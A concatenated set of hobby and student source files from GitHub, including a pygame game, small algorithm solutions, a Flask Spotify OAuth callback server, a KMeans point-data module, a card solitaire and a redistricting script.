player_pos[0]\n\t\t\ty = player_pos[1] \n\n\t\t\tif event.key == pygame.K_LEFT:\n\t\t\t\tif x < player_size:\n\t\t\t\t\tx = 0\n\t\t\t\telse:\n\t\t\t\t\tx -= player_size\n \n\t\t\telif event.key == pygame.K_RIGHT:\n\t\t\t\tif x > WIDTH-(2*player_size):\n\t\t\t\t\tx = WIDTH-player_size\n\t\t\t\telse:\n\t\t\t\t\tx += player_size\n \n\t\t\telif event.key == pygame.K_a:\n\t\t\t\tif x < player_size:\n\t\t\t\t\tx = 0\n\t\t\t\telse:\n\t\t\t\t\tx -= player_size\n \n\t\t\telif event.key == pygame.K_d:\n\t\t\t\tif x > WIDTH-(2*player_size):\n\t\t\t\t\tx = WIDTH-player_size\n\t\t\t\telse:\n\t\t\t\t\tx += player_size\n \n\t\t\tplayer_pos = [x, y]\n\t\t\tplayer.update(player_pos[0], player_pos[1])\n\n\t# * BG\n\t# screen.blit(backGround, (0, 0))\n\tscreen.fill(BLACK)\n\n\t# * Score\n\tScoreText = \"Score:\" + str(score)\n\tScoreLabel = scoreFont.render(ScoreText, 1, WHITE)\n\tscreen.blit(ScoreLabel, (WIDTH-((WIDTH/2)+125), HEIGHT-1150))\n\tscore = update_enemy_positions(enemy_list, score)\n \n\t# * Speed\n\tSPEED = set_level(score, SPEED)\n\t\n\t# * Draw and drop enemies\n\tdrop_enemies(enemy_list)\n\t# draw_enemies(enemy_list)\n\tdrop_enemies(enemy_list)\n\t# draw_enemies(enemy_list)\n\n \n \t# * Draw player\n\t# ! pygame.draw.rect(screen, BLUE, (player_pos[0], player_pos[1], player_size, player_size))\n\tplayer_group.draw(screen)\n\t\n\t# * Collision check\n\tif collision_check(enemy_list, player_pos):\n\t\tprint(' ')\n\t\tprint('Final score :', score)\n\t\tscreen.fill(BLACK)\n\t\tscreen.blit(ScoreLabel, (WIDTH-((WIDTH/2)+125), HEIGHT-1150))\n\t\tGameOverText = \"Game Over\"\n\t\tGameOverLabel = gameOverFont.render(GameOverText, 1, RED)\n\t\tscreen.blit(GameOverLabel, (WIDTH-((WIDTH/2)+250), HEIGHT-750 ))\n\t\tend_game = True\n\t\n \t# * Clock\n\tclock.tick(50)\n \n\tpygame.display.update()","repo_name":"lavadragon15396/Block-Jam","sub_path":"source/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"40530190810","text":"def magic_square(n):\n    # create \"empty\" n*n matrix\n    matrix = []\n    for i in range(n):\n        line = []\n        for j in range(n):\n            line.append(None)\n        matrix.append(line)\n\n    # start the algorithm\n    i = 0\n    j = n // 2\n    matrix[i][j] = 1\n    number = 2\n    while number <= n**2:\n        # get new positions for i and j according to the rules\n        i -= 1\n        j += 1\n\n        # make sure i and j are in valid positions\n        if (i < 0) and (j > n - 1):\n            # print(\"the new condition\")\n            i += 2\n            j -= 1\n        if i < 0:\n            i = n - 1\n        if j > n - 1:\n            j = 0\n        if matrix[i][j]:\n            # print(f\"moved i to {i + 2} because {matrix[i][j]} was already there\")\n            i += 2\n            j -= 1\n\n        # position the numbers inside the matrix\n        # print(f\"printing {number} to {i, j}\")\n        matrix[i][j] = number\n        number += 1\n    \n    return matrix\n\ndef print_matrix(matrix):\n    for line in matrix:\n        print(line)\n\ntry:\n    print_matrix(magic_square(5))\nexcept:\n    print(\"fucked up lmao\")\n    ","repo_name":"emanuxd11/FP-feup","sub_path":"MT2_prac/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"70452445905","text":"import flask\nfrom flask import request\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# Must be a dictionary, a String doesn't maintain state\ncode = {}\n\n@app.route('/', methods=['GET'])\ndef testPage():\n    return '''\n    Test page\n    '''\n\n@app.route('/callback', methods=['GET'])\ndef spotifyRedirect():\n\n    code[\"code\"] = (request.args.get('code'))\n    error = request.args.get('error')\n    if error != None:\n        # CASE: user denied access - return error page\n        code[\"code\"] = error\n        print(\"received error: \" + code[\"code\"])\n        return '''\n        You've denied access to Spotify.\n        The application will not work if access is not given. \n            Please close this webpage and try again.\n        '''\n\n    print(\"received code: \" + code[\"code\"])\n\n    return '''\n    Success: Access to Spotify granted.\n    You can close this webpage and return to the console.\n    
'''\n\n# Send code to Java app\n@app.route('/getcode', methods=['GET'])\ndef getAccessCode():\n accessCode = code[\"code\"]\n print(\"sending code: \" + code[\"code\"])\n code[\"code\"] = \"\"\n return accessCode\n\napp.run(host=\"0.0.0.0\", port=8888)","repo_name":"csavage5/CMPT-383-Project","sub_path":"flaskWebserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27945943035","text":"\"\"\"Given an integer rowIndex, return the rowIndexth (0-indexed) row of the Pascal's triangle.\n\nIn Pascal's triangle, each number is the sum of the two numbers directly above it as shown:\"\"\"\nclass Solution:\n def getRow(self, rowIndex: int) -> List[int]:\n r = [1]\n for i in range(1, rowIndex + 1):\n r.append(r[-1]*(rowIndex - i + 1)/i)\n a = list(map(int, r)) \n return a\n","repo_name":"akshayagunnam/MyPythonJourney","sub_path":"LeetCodeProblems/Problem_119.py","file_name":"Problem_119.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69815134866","text":"def intersetPoint(head1,head2):\n #code here\n cur1 = head1\n cur2 = head2\n if cur1 == None or cur2 == None:\n return -1\n while cur1 != cur2:\n cur1 = cur1.next\n cur2 = cur2.next\n \n # if cur1 == cur2:\n # return cur1.data\n \n if cur1 == None:\n cur1 = head2\n if cur2 == None:\n cur2 = head1\n \n return cur2.data \n","repo_name":"DDR7707/Final-450-with-Python","sub_path":"Linked Lists/150.Intersection of Two Linked Lists.py","file_name":"150.Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"28839523441","text":"from sys import stdin\n\n\nclass FenwickTree(object):\n\n def __init__(self, n):\n self._tree = [0]*(n+1)\n self._arr = [0]*(n+1)\n self._n = n\n\n def add(self, index, value):\n index += 1\n pos = index \n diff = value-self._arr[index]\n\n while pos <= self._n:\n self._tree[pos] += diff\n pos += (pos & -pos)\n self._arr[index] = value\n\n def sum(self, index):\n index += 1\n pos = index\n \n _sum = 0\n while pos >= 1:\n _sum += self._tree[pos]\n pos &= (pos-1)\n return _sum\n\n def __str__(self):\n return ' '.join(map(str, self._tree))\n\n\nif __name__ == '__main__':\n readline = stdin.readline\n n, m, k = map(int, readline().split(' '))\n ft = FenwickTree(n)\n for i in range(n):\n ft.add(i, int(readline()))\n\n for i in range(m+k):\n a, b, c = list(map(int, readline().split(' ')))\n\n if a == 1:\n ft.add(b-1, c)\n else:\n print(ft.sum(c-1) - ft.sum(b-2))\n\n","repo_name":"wonjaek36/algorithm_test","sub_path":"baekjoon/2042/2042.py","file_name":"2042.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12195323232","text":"\"\"\"\nclass for processing point data\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom shapely.geometry import MultiPoint\nfrom sklearn.cluster import KMeans\n\n\nclass pointData(object):\n def __init__(self, df=None, xname=\"x\", yname=\"y\"):\n self.df = df\n self.xname = xname\n self.yname = yname\n\n return\n\n def create2dGrid(self, dx, dy, xmin, xmax, ymin, ymax):\n \"\"\"creates a 2d grid\"\"\"\n Nx = int(np.ceil((xmax - xmin) / dx))\n Ny = int(np.ceil((ymax - ymin) / dy))\n\n # grid nodes\n x 
= np.linspace(xmin, xmax, Nx + 1)\n y = np.linspace(ymin, ymax, Ny + 1)\n setattr(self, self.xname, x)\n setattr(self, self.yname, y)\n\n # cell centers\n x_c = (x[1:] + x[0:-1]) / 2\n y_c = (y[1:] + y[0:-1]) / 2\n setattr(self, self.xname + \"_c\", x_c)\n setattr(self, self.yname + \"_c\", y_c)\n\n def assignDfToGrid(self, binfields=None):\n \"\"\"finds stats within bins. binfield is the field to bin\"\"\"\n\n if binfields is None:\n binfields = []\n\n if hasattr(self, self.xname):\n xedges = getattr(self, self.xname)\n yedges = getattr(self, self.yname)\n\n # initialize\n gridded = {}\n\n for binfield in binfields:\n gridded[binfield] = {}\n stats_list = [\"mean\", \"median\", \"max\", \"min\", \"std\", \"count\"]\n Nx = xedges.size - 1\n Ny = yedges.size - 1\n for stat in stats_list:\n gridded[binfield][stat] = np.zeros((Nx, Ny))\n gridded[binfield][stat][:] = np.nan\n\n # restrict to grid min/max\n df0 = self.df[\n (self.df[self.xname] >= xedges.min())\n & (self.df[self.xname] <= xedges.max())\n ]\n df0 = df0[\n (df0[self.yname] >= yedges.min()) & (df0[self.yname] <= yedges.max())\n ]\n\n # need stats beyond mean, hist2d won't work. Loop over 1 spatial dim,\n # use pandas cut\n for i_x in range(0, Nx):\n\n # find all values within this x\n x1 = xedges[i_x]\n x2 = xedges[i_x + 1]\n df = df0[(df0[self.xname] >= x1) & (df0[self.xname] < x2)]\n\n if len(df) > 0:\n\n # cut and aggregate along y at this x\n bins = pd.cut(\n df[self.yname], yedges, include_lowest=True, right=True\n )\n\n for binfield in binfields:\n aggd = df.groupby(bins)[binfield].agg(stats_list)\n\n # store each stat\n for stat in stats_list:\n gridded[binfield][stat][i_x, :] = aggd[stat]\n\n else:\n print(\"grid contains no data at this x1,x2,i_x:\")\n print([x1, x2, i_x])\n\n if \"max\" in gridded.keys() and \"min\" in gridded.keys():\n gridded[\"span\"] = gridded[\"max\"] - gridded[\"min\"]\n\n gridded[self.xname] = xedges\n gridded[self.yname] = yedges\n gridded[self.xname + \"_c\"] = (xedges[1:] + xedges[0:-1]) / 2.0\n gridded[self.yname + \"_c\"] = (yedges[1:] + yedges[0:-1]) / 2.0\n else:\n print(\"grid required for assignDfToGrid\")\n gridded = None\n\n return gridded\n\n\ndef KmeansSensitivity(max_N, X1, X2, min_N=1):\n \"\"\"iterative Kmeans clustering using clusters 1 through max_N for 2 variables\n\n Parameters\n ----------\n max_N : int\n max number of clusters to use\n X1 : ndarray\n first variable for clustering (assumed to be normalized)\n X2 : type\n second variable for clustering (assumed to be normalized)\n\n Returns\n -------\n dict\n dictionary of results with following keys\n 'clusters' ndarray, the cluster range\n 'inertia' ndarray, inertia value for each clustering\n 'bounds' dict with bounding polygons by cluster, label within cluster\n\n\n Example Usage\n -------------\n results=pdd.KmeansSensitivity(18,X1,X2)\n\n where X1, X2 are normalized observations of the same length\n\n to pull out bounding polygons of a cluster:\n\n results['bounds'][2][0]\n \"\"\"\n\n results = {\"bounds\": {}, \"X1\": X1, \"X2\": X2}\n Xcluster = np.column_stack((X1, X2))\n\n Nclusters = range(min_N, max_N + 1)\n inert = []\n\n for nclust in Nclusters:\n clustering = KMeans(n_clusters=nclust).fit(Xcluster)\n inert.append(clustering.inertia_)\n results[\"bounds\"][nclust] = {}\n\n # find bounding polygon of each cluster\n for lev in np.unique(clustering.labels_):\n x_1 = X1[clustering.labels_ == lev]\n x_2 = X2[clustering.labels_ == lev]\n b = MultiPoint(np.column_stack((x_1, x_2))).convex_hull\n 
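# the convex hull of this cluster's points becomes the cluster's bounding polygon\n            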
results[\"bounds\"][nclust][lev] = b\n\n results[\"inertia\"] = np.array(inert)\n results[\"clusters\"] = np.array(Nclusters)\n\n return results\n\n\ndef plotKmeansSensitivity(kMeansResults, cmapname=\"hot\", N_best=None):\n \"\"\"builds plots of KmeansSensitivity results\n\n Parameters\n ----------\n kMeansResults : dict\n the dict returned from KmeansSensitivity\n cmapname : string\n name of matplotlib colormap to use (the default is 'hot').\n N_best : int\n if not None, will highlight best_N in inertia plot (the default is None)\n\n Returns\n -------\n fig1,fig2\n figure handles for composite histogram plot and inertia plot\n\n \"\"\"\n fig1 = plt.figure()\n maxClusters = max(kMeansResults[\"clusters\"])\n Ntests = len(kMeansResults[\"clusters\"])\n Ncols = int(np.ceil(maxClusters / 2))\n Ncols = 5 if Ncols > 5 else Ncols\n Nrows = np.ceil(Ntests / (Ncols * 1.0))\n\n X1 = kMeansResults[\"X1\"]\n X2 = kMeansResults[\"X2\"]\n for nclust in kMeansResults[\"clusters\"]:\n ax = plt.subplot(Nrows, Ncols, nclust)\n ax.hist2d(X1, X2, bins=100, density=True, cmap=cmapname)\n for lev in kMeansResults[\"bounds\"][nclust].keys():\n b = kMeansResults[\"bounds\"][nclust][lev]\n ax.plot(b.boundary.xy[0], b.boundary.xy[1], color=\"w\")\n plt.title(str(nclust))\n\n fig2 = plt.figure()\n plt.plot(kMeansResults[\"clusters\"], kMeansResults[\"inertia\"], \"k\", marker=\".\")\n\n if N_best is not None and N_best in kMeansResults[\"clusters\"]:\n inertval = kMeansResults[\"inertia\"][kMeansResults[\"clusters\"] == N_best]\n plt.plot(N_best, inertval, \"r\", marker=\"o\")\n\n plt.xlabel(\"N\")\n plt.ylabel(\"kmeans inertia\")\n return fig1, fig2\n\n\ndef calcKmeans(best_N, X1vals, X2vals):\n def scaleFunc(X_raw):\n return (X_raw - X_raw.min()) / (X_raw.max() - X_raw.min())\n\n def unscaleFunc(Xsc, X_raw):\n return Xsc * (X_raw.max() - X_raw.min()) + X_raw.min()\n\n X1 = scaleFunc(X1vals)\n X2 = scaleFunc(X2vals)\n Xcluster = np.column_stack((X1, X2))\n clustering = KMeans(n_clusters=best_N).fit(Xcluster)\n return {\"X1\": X1, \"X2\": X2, \"clustering\": clustering}\n","repo_name":"chrishavlin/ytgeotools","sub_path":"ytgeotools/point_data.py","file_name":"point_data.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31433033147","text":"from Stackoverflow import SentimentAnalysis as sa\nimport pandas as pd\nimport csv\nfrom datetime import date,datetime\n\n\n# Id\tReputation\tCreationDate\tDisplayName\tLastAccessDate\tWebsiteUrl\tLocation\tAboutMe\tViews\tUpVotes\tDownVotes\tProfileImageUrl\tEmailHash\tAccountId\n\ndef get_user_deatils(file_path, column_name_for_user_id):\n df = pd.read_csv(file_path)\n\n df = df.sort_values(column_name_for_user_id)\n\n user_data = []\n user_data.append(['UserId','name', 'reputation', 'experience', 'upvotes', 'downvotes'])\n today = datetime.today()\n\n for index, row in df.iterrows():\n reputation = row['Reputation']\n\n datetime_object = datetime.strptime(row['CreationDate'], '%y-%m-%d %H:%M')\n experience=(today-datetime_object).days\n\n upvotes = row['UpVotes']\n downvotes = row['DownVotes']\n\n user_data.append([row['Id'],row['DisplayName'],reputation,experience,upvotes,downvotes])\n\n with open('C:/Users/pc/Desktop/FYP data/test_results/sse_results.csv', 'w') as csvFile:\n writer = csv.writer(csvFile)\n for row in user_data:\n writer.writerow(row)\n csvFile.close()\n\n # return user_data\n\n\n# file_path_for_answer_posts='C:/Users/pc/Desktop/FYP/data/user_data.csv'\n# 
column_name_for_user_id='Id'\n# get_user_years_stovfl(file_path_for_answer_posts,column_name_for_user_id)\n\n# ============================ common method for counting average word counts post,comments user wise =====================================\n\ndef get_tags_user_wise(file_path, column_name_for_user_id,text_column_name):\n df = pd.read_csv(file_path)\n df = df.sort_values(column_name_for_user_id)\n user_data = []\n user_data.append(['UserId','tags'])\n tags=[]\n tag_count=0\n count = 0\n df_line = 0\n for index, row in df.iterrows():\n text =row[text_column_name]\n text = ((((text.replace('<', ' ')).replace('>', '')).lstrip()).rstrip()).split(' ')\n if df_line == 0:\n previous_user = ''\n df_line += 1\n else:\n current_user = row[column_name_for_user_id]\n if previous_user == '' or previous_user == current_user:\n count += 1\n df_line += 1\n for tag in text:\n if tag not in tags:\n tags.append(tag)\n tag_count+=1\n if df_line == len(df.index) or (previous_user != '' and previous_user != current_user):\n user_data.append([previous_user, tags])\n count = 1\n df_line += 1\n tags=[]\n tag_count=0\n for tag in text:\n tags.append(tag)\n tag_count += 1\n\n previous_user = current_user\n return user_data\n","repo_name":"ruchiraPeiris/Starc-Recruiter","sub_path":"Stackoverflow/FeatureExtraction/tec_skills.py","file_name":"tec_skills.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"548828413","text":"# Marc-Olivier Morin (20187831 ) et Tobias Lepoutre (20177637)\n\nimport random\nimport math\n\n# tableau contenant toute les svg des cartes\ncards = ['2C.svg', '2D.svg', '2H.svg', '2S.svg', '3C.svg', '3D.svg', '3H.svg', '3S.svg', '4C.svg', '4D.svg', '4H.svg', '4S.svg', '5C.svg', '5D.svg', '5H.svg', '5S.svg', '6C.svg', '6D.svg', '6H.svg', '6S.svg', '7C.svg', '7D.svg', '7H.svg', '7S.svg', '8C.svg', '8D.svg', '8H.svg', '8S.svg', '9C.svg', '9D.svg', '9H.svg', '9S.svg', '10C.svg', '10D.svg', '10H.svg', '10S.svg','JC.svg', 'JD.svg', 'JH.svg', 'JS.svg', 'QC.svg', 'QD.svg', 'QH.svg', 'QS.svg', 'KC.svg', 'KD.svg', 'KH.svg', 'KS.svg','empty.svg']\n\n# fonction qui prend en paramètre un tableau (vide si il n'y une crée une nouvelle matrice, ou une liste contenant\n# les cartes à ne pas brasser lorsque le boutton brasser est appuyé. retourne une matrice contentant 4 tableau de 13\n# chiffres aléatoire non répétitif (sauf pour les cases vide qui sont représentés par des -1). Chaque chiffres est la\n# position à aller chercher dans le liste cards lors de l'affichage \ndef createMatrix(noMatrix):\n nbCards =48 \n tab=[[],[],[],[]]\n\n listOrdRef=list(range(nbCards)) # créé une liste de 48\n print(listOrdRef)\n for _ in range(4): # rajoute case vide\n listOrdRef.append(-1)\n\n nbCards +=4\n rangee=nbCards/4\n\n for exception in noMatrix: # met les positions qui ne doit pas être déplacé\n listOrdRef.remove(exception[0])\n tab[exception[1]].append(exception[0])\n nbCards-=1\n\n for i in tab: \n while len(i)\n #jeu table { float: none; }\n #jeu table td { border: 0; padding: 1px 2px; height: auto; }\n #jeu table td img { height: auto; }\n\n\"\"\"\nbuttonShuffle=\"\"\"\n

\n
\n\n

Vous pouvez encore

\n \n

\n \n
\n \"\"\"\nbuttonRedo = \"\"\"\n
\n
\n \n
\n \"\"\"\n\n\n# fonction qui prend deux strings en paramètre et retourne une string contenant la balise pour l'afficahge HTML\ndef tdHTML(attrs, contenu):\n return ''+contenu+''\n\n# fonction qui prend une string en paramètre et retourne une string contenant la balise pour l'afficahge HTML\ndef imgHTML(src):\n return ''\n\n# fonction qui prend une string en paramètre et retourne une string contenant la balise pour l'afficahge HTML\ndef trHTML(contenu):\n return '' + contenu + ''\n\n# fonction qui prend une string en paramètre et retourne une string contenant la balise pour l'afficahge HTML\ndef tableHTML(contenu):\n return '
' + contenu + '
'\n\n\n# fonction qui permet créer une string pour l'affichage HTML à partir de la matrice matrix qui est créé par la\n# fonction create matrix\ndef arrayHTML():\n arrayText = \"\"\n for i in range(len(matrix)): # passe à travers chaque list de matrix\n arrayTextInner = \"\"\n for j in range (len(matrix[i])): # passe à travers chaque nombres dans les listes\n\n case = str(j+i*len(matrix[i]))\n temp = imgHTML(cards[matrix[i][j]]) # assigne le id et le onclick au td\n temp1 = ' id=\"case' + case +'\" onclick=\"clic(' + case +')\"'\n arrayTextInner += tdHTML(temp1,temp)\n \n arrayText += trHTML(arrayTextInner)\n return tableHTML(arrayText)\n\n# fonction permettant de brasser les cartes tout en préservant les cartes déjà placées.\ndef brasser():\n global matrix; global nbBrasser\n \n noMatrix=[]\n rangee=len(matrix[0])\n for r in range(4): # pour chaque rangée: \n if matrix[r][0]<=3 and matrix[r][0]>-1: # si la première carte de la rangée est un deux:\n noMatrix.append([matrix[r][0],r]) # ajouter la carte à noMatrix\n for i in range(1,rangee): # pour chaque carte de cette rangé suivant le deux\n if matrix[r][i]==4*i+matrix[r][0]: # si la carte suivante correspond bien à la suite d'une même couleur:\n noMatrix.append([matrix[r][i],r]) # ajouter la valeur de la carte suivante à noMatrix\n else:\n break # sinon passer a la rangée suivante\n\n matrix =createMatrix(noMatrix)\n nbBrasser -=1\n ifOver()\n init()\n\n# fonction qui détermine si elle est encore possible de brasser. Si il n'est pu possible de brasser, elle enlève le \n# bouton qui permet de brasser \ndef ifOver():\n global buttonShuffle\n if nbBrasser <= 0: \n buttonShuffle=\"\"\"\n

\n
\n

Vous ne pouvez plus brasser

\n
\n \"\"\"\n\n# fonction permettant de recommencer une partie en remttant tout les paramêtres\n# à leur état initial.\ndef recommencer():\n global nbBrasser; global matrix; global buttonShuffle \n nbBrasser=3 \n matrix=createMatrix([])\n buttonShuffle=\"\"\"\n

\n
\n

Vous pouvez encore

\n \n

\n
\n \"\"\"\n init() # fait appelle à init() pour appliquer les valeurs initiales à l'HTML\n\n# fonction utilisée dans greenCards() qui retourne un tableau contenant\n# les valeurs des cartes à déplacer en plus des coordonées de la carte blanche à remplacer.\ndef options():\n movable=[]\n rangee=len(matrix[0])\n for r in range(4):\n for i in range(rangee):\n if matrix[r][i]==-1: # si la carte est vide:\n if i==0: # si il s'agit de la première carte de la rangée:\n for deux in range(4): # ajouter tous les deux à \"movable\"\n movable.append([deux,[r,0]]) \n else:\n if matrix[r][i-1]>43 or matrix[r][i-1]==-1: # si la carte précedente est vide ou si c'est un roi:\n continue # passer à la carte suivante\n else:\n x=matrix[r][i-1]+4 # ajouter la valeur de la carte à \"movable\"\n movable.append([x,[r,i]]) # en plus de [r,i] qui sont les coordonnées de la case vide\n return movable\n\n# fonction permettant de changer la couleur de fond des carte à déplacer.\ndef greenCards():\n movable = options()\n copy=[]\n for i in range(4):\n copy.extend(matrix[i]) # crée un tableau simple à partir de la matrix\n for tab in movable: # pour chaque tableau de \"movable\":\n num=copy.index(tab[0]) # num= valeur de la carte à déplacer\n case='#case'+str(num)\n document.querySelector(case+' > img').setAttribute(\"style\", \"background-color: lime\") #changer la couleur de la carte à déplacer\n\n# fonction permettant de remplacer les carte directement dans l'HTML et de changer la couleur\n# des cartes en fonction de ces changements.\ndef change(case,movable,space):\n caseId1='#case'+str(case)\n original=document.querySelector(caseId1).innerHTML\n caseId2='#case'+str(space)\n empty=document.querySelector(caseId2).innerHTML\n \n document.querySelector(caseId1).innerHTML=empty # échanger la position de carte en vide avec la carte à déplacer\n document.querySelector(caseId2).innerHTML=original\n\n copy=[]\n for i in range(4):\n copy.extend(matrix[i]) # crée un tableau simple à partir de la matrix\n for tab in movable: # pour chaque tableau de \"movable\":\n num=copy.index(tab[0])\n case='#case'+str(num) # num= valeur de la carte déplacée\n document.querySelector(case+' > img').removeAttribute(\"style\") # enlever le style de tout les cartes qui pouvaient être déplacer\n\n# fonction permettant d'envoyer un message adapté à la situation du jeux\n# (victoire, échec, obligation de brasser)\ndef verification():\n for i in range(4): # si la dernière carte de la rangé est vide & \n if matrix[i][-1]==-1 and matrix[i][-2]==matrix[i][0]+11*4: # avant dernière carte==au roi de la carte en première position:\n gagner=True\n else:\n gagner=False\n break \n if nbBrasser > 0 and gagner==False: # si on peut encore brasser et qu'on n'a pas gagné: obligation de brasser\n document.querySelector(\"#message\").innerHTML=\"\"\"\n

Vous devez

\n \n \"\"\"\n if nbBrasser <= 0 and gagner==False: # si on peut plus brasser et qu'on n'a pas gagné: echec\n document.querySelector(\"#message\").innerHTML=\"\"\"\n
\n        Vous n'avez pas réussi à placer toutes les cartes... Essayez à nouveau!
\n \"\"\"\n if gagner==True: # si on a gagné: alerter le joueur\n document.querySelector(\"#message\").innerHTML=\"\"\"\n
Vous avez réussi! Bravo!
\n \"\"\"\n\n# fonction qui applique les fonctions options(), change(), greenCards() et verification() en fonction de la position\n# du clic du joueur.\ndef clic(case):\n global matrix\n movable=options()\n index=case%13 # index dans la rangée\n r=math.floor(case/13) # position en terme de rangée\n valeur=matrix[r][index] # valeur de la carte dans la case donnée\n for tab in movable: \n if tab[0]==valeur: \n matrix[tab[1][0]].pop(tab[1][1]) # retirer dans la rangée (tab[1][0]) la valeur située à l'index (tab[1][1]) corréspondant à la case vide\n matrix[tab[1][0]].insert(tab[1][1],valeur) # ajouter à cette même position la valeur de la carte à déplacer\n space=tab[1][0]*13+tab[1][1] # retirer la valeur de l'index (tab[1][1]) de la rangée tab[1][0]) correspondant à la carte à déplacer\n matrix[r].pop(index) # ajouter à cette même position la valeur d'une carte vide (soi -1)\n matrix[r].insert(index,-1) # calculer l'id de la case vide à partir de la rangée(tab[1][0]) et l'index (tab[1][1]) contenu dans le tableau de \"movable\"\n change(case,movable,space) # changer la position dans l'HTML grâce à la nouvelle matrix\n break\n greenCards()\n if \"lime\" not in document.querySelector(\"#jeu\").innerHTML: \n verification()\n\n\n# fonction que permet de modifier l'intérieur de la balise ayant l'id main. Ensuite elle met en place le nombre de \n# shuffle qui reste et initialise la fonction qui permet de mettre en lime les cartes que l'on peut déplacer\ndef init():\n document.querySelector(\"#main\").innerHTML = styleHTML + arrayHTML() + buttonShuffle + buttonRedo\n document.querySelector(\"#nbShuffle\").innerHTML = str(nbBrasser) + \" fois\"\n greenCards()","repo_name":"tobiaslepoutre/solitaire","sub_path":"tp2.py","file_name":"tp2.py","file_ext":"py","file_size_in_byte":12670,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17087852257","text":"import networkx as nx\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom gerrychain import Graph\nfrom tqdm import tqdm\n\n# Parameters\n# ==============================\n\n# How many districts to generate\nN_DISTRICTS = 25\n\n# How far seed tracts must be apart, at minimum\nMIN_SEED_DISTANCE = 10\n\n# Tracts with EJ >= EJ_MINORITY_CUTOFF\n# are considered \"minority\"\nEJ_MINORITY_CUTOFF = 3\n\n# The minority vote wins if\n# CROSSOVER_PERCENT of majority voters crossover\nCROSSOVER_PERCENT = 0.2\n\n# Load generated graph\ngraph = Graph.from_json('data/gen/graph.json')\n\nTractId = int\nDistrict = tuple[TractId, list[TractId]]\n\ntracts_file = 'data/src/ACS_2018_5YR_TRACT_36_NEW_YORK.gdb'\ngeo_layer = 'ACS_2018_5YR_TRACT_36_NEW_YORK'\ntracts_geo = gpd.read_file(tracts_file, layer=geo_layer)\ntracts_geo.set_index('GEOID', inplace=True)\ntracts_geo['Label'] = 'Unassigned'\n\ncolor_mapping = {\n 'Unassigned': '#eeeeee',\n 'Seed': '#ff0000',\n}\ndistrict_colors = [\n '#5E4FA2',\n '#54AEAD',\n '#BFE5A0',\n '#FFFFBD',\n '#FDBF6F',\n '#E85C47',\n '#9D0041'\n]\nfor i in range(N_DISTRICTS):\n idx = i % len(district_colors)\n color_mapping['District {}'.format(i)] = district_colors[idx]\n\ndistances = defaultdict(dict)\n\ndef get_distance(source, target) -> int:\n dist = distances.get(source, {}).get(target)\n if dist is None:\n path = nx.shortest_path(graph, source=source, target=target)\n dist = len(path)\n distances[source][target] = dist\n distances[target][source] = dist\n return dist\n\ndef select_seeds():\n pbar = tqdm(total=N_DISTRICTS, 
desc='Finding seeds')\n node_ids = list(graph.nodes)\n\n # Sort by EJ class, high to low\n node_ids.sort(key=lambda id: -graph.nodes[id]['EJ_Class'])\n\n seeds = [node_ids.pop(0)]\n pbar.update(1)\n\n while len(seeds) < N_DISTRICTS and node_ids:\n node_id = node_ids.pop(0)\n dists = [get_distance(seed, node_id) for seed in seeds]\n if all(dist >= MIN_SEED_DISTANCE for dist in dists):\n seeds.append(node_id)\n pbar.update(1)\n\n return seeds\n\ndef is_minority(tract) -> bool:\n return tract['EJ_Class'] >= EJ_MINORITY_CUTOFF\n\ndef vote_fn(tract_id: TractId) -> tuple[float, float]:\n \"\"\"Return the minority and majority candidate votes\n for a given tract. The naive version of this assumes\n all minority voters vote for the minority candidate and\n all majority voters vote for the majority candidate.\n We then incorporate the desired crossover amount to give\n a majority for the minority candidate.\n Ideally you would use real election data to\n reflect actual voting patterns, but we were unable to\n find adequately detailed data.\n \"\"\"\n tract = graph.nodes[tract_id]\n pop = tract['population']\n if is_minority(tract):\n maj_vote = 0\n min_vote = pop\n else:\n maj_vote = (1-CROSSOVER_PERCENT) * pop\n min_vote = CROSSOVER_PERCENT * pop\n return min_vote, maj_vote\n\ndef get_candidates(district: District, unclaimed: set[TractId]) -> list[TractId]:\n \"\"\"Get candidate tracts for a district.\n These tracts are adjacent to the existing district\n that are closest to the seed tract (to ensure compactness).\"\"\"\n seed, tract_ids = district\n neighbors = set()\n for tract_id in tract_ids:\n for neighb in graph.neighbors(tract_id):\n if neighb not in tract_ids and neighb in unclaimed:\n neighbors.add(neighb)\n\n dists = []\n for neighb in neighbors:\n dist = get_distance(seed, neighb)\n dists.append(dist)\n\n return [neighb for dist, neighb\n in zip(dists, neighbors)\n if dist >= min(dists)]\n\ndef district_votes(district: District) -> tuple[float, float]:\n _, tract_ids = district\n min_votes, maj_votes = 0, 0\n for tract_id in tract_ids:\n min_vote, maj_vote = vote_fn(tract_id)\n min_votes += min_vote\n maj_votes += maj_vote\n return min_votes, maj_votes\n\ndef district_pop(district: District) -> tuple[float, float]:\n _, tract_ids = district\n min_pop, maj_pop = 0, 0\n for tract_id in tract_ids:\n tract = graph.nodes[tract_id]\n pop = tract['population']\n if is_minority(tract):\n min_pop += pop\n else:\n maj_pop += pop\n return min_pop, maj_pop\n\ndef score_district(district: District) -> float:\n \"\"\"Score a district based on the desired\n crossover amount\"\"\"\n 